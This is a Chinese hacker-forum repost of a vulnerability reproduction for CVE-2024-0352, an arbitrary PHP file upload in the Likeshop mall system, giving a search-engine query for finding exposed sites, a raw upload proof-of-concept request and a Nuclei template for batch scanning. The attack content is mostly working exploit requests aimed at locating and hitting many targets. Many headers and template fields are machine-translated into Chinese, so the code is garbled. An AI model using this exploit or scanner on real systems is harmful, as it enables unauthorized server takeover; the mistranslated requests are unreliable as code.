跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

漏洞复现--Likeshop任意文件上传(CVE-2024-0352)

精选回复

发布于

# 免责声明:

**文中涉及的漏洞已修复,敏感信息已编码。文章仅供经验分享。别当真。未经授权的攻击是违法的!文章中的敏感信息已经过多个级别的处理。因传播、使用本文提供的信息而造成的任何直接或间接的后果和损失均由用户自行承担。作者对此不承担任何责任。一切后果请自行承担。 **

## 1:漏洞描述

Likeshop是一个100%开源免费的B2B2C多商户商城系统,支持官方旗舰店、商户入驻、平台佣金+商户独立结算、统一下单+订单拆分等功能。该产品存在任意文件上传,攻击者可以通过该漏洞上传木马获取服务器权限。

## 2:受漏洞影响的版本

版本=2.5.7.20210311

## 三:网络空间地图查询

福法

`icon_hash=\'874152924\'` 1705396453_65a648e50844c3e9af6a4.png!small

##四:漏洞复现1705396565_65a64955aa45b80602203.png!small

POC:

````

POST /api/file/formimage HTTP/2

主机: x.x.x。

User-Agent: Mozilla/5.0(Windows NT 6.3;WOW64)AppleWebKit/537.36(KHTML,如Gecko)Chrome/41.0.2226.0 Safari/537.36

连接:关闭

内容长度: 201

Content-Type: 多部分/表单数据;边界=----WebKitFormBoundarygcflwtei

Accept-Encoding: gzip、deflate

------WebKitFormBoundarygcflwtei

Content-Disposition: 表单数据; name=\'file\';filename=\'test.php\'

内容类型:应用程序/x-php

该页面存在漏洞!

------WebKitFormBoundarygcflwtei--

``1705396675_65a649c38acb8a8e75716.png!small

1705396716_65a649ec6354f1374b5d9.png!small

## 批量检测

````

id: CVE-2024-0352

信息:

name: Likeshop 2.5.7.20210311 - 任意文件上传

作者: CookieHanHoan,babybash,samuelsamuelsamuel

严重性: 高

描述: |

Likeshop 中发现了一个严重漏洞,版本号为2.5.7.20210311。该漏洞影响组件HTTP POST Request Handler的文件server/application/api/controller/File.php的FileServer:userFormImage函数。使用未知输入操作参数文件会导致不受限制的上传漏洞。该漏洞的CWE 定义为CWE-434

影响: |

该产品允许攻击者上传或传输可在产品环境中自动处理的危险类型的文件。众所周知,它会影响机密性、完整性和可用性。

remediation: 更新到最新版本

参考:

- https://nvd.nist.gov/vuln/detail/CVE-2024-0352

- https://note.zhaoj.in/share/ciwYj7QXC4sZ

- https://vuldb.com/?ctiid.250120

- https://vuldb.com/?id.250120

分类:

cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

cvss-score: 7.3

CVE-id: CVE-2024-0352

CWE-id: CWE-434

元数据:

已验证: 正确

最大请求: 1

供应商: 喜欢商店

shodan-query: http.favicon.hash:874152924

标签: cve、cve2024、rce、文件上传、likeshop、侵入性、侵入性

变量:

文件名: \'{{rand_base(6)}}\'

http:

- 原始:

- |

POST /api/file/formimage HTTP/1.1

Host: {{主机名}}

Content-Type: 多部分/表单数据;边界=----WebKitFormBoundarygcflwtei

User-Agent: Mozilla/5.0(Windows NT 6.3;WOW64)AppleWebKit/537.36(KHTML,如Gecko)Chrome/41.0.2226.0 Safari/537.36

------WebKitFormBoundarygcflwtei

Content-Disposition: 表单数据; name=\'文件\';filename=\'{{filename}}.php\'

内容类型:应用程序/x-php

{{兰德斯特}}

------WebKitFormBoundarygcflwtei--

匹配器:

- : DSL 型

DSL:

- '状态代码==200'

- '包含(正文,\'\\\'名称\\':\\\'{{文件名}}.php\\\'\')'

- 'contains_all(body, \'代码\\\':1\', \'base_url\\\':\\\'上传\/用户\')'

条件: 和

提取器:

- 类型: json

Part: 身体

json:

- \'.data.url\'

#digest: 4a0a00473045022100deb88d0d5f3f0af25df24379957bd65e84c9ce39a4d8c4aa791388f67b61c25002207f6c805 34d7839ef8754e96b5ea1c543908e9c77315afcb83a24e6022d227026:922c64590222798bb761d5b6d8e72950

``1705397597_65a64d5d78b0202cd5a9e.png!small

转载自freebuf:[https://www.freebuf.com/articles/web/389841.html](https://www.freebuf.com/articles/web/389841.html)

作者:奶酪土拨鼠

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。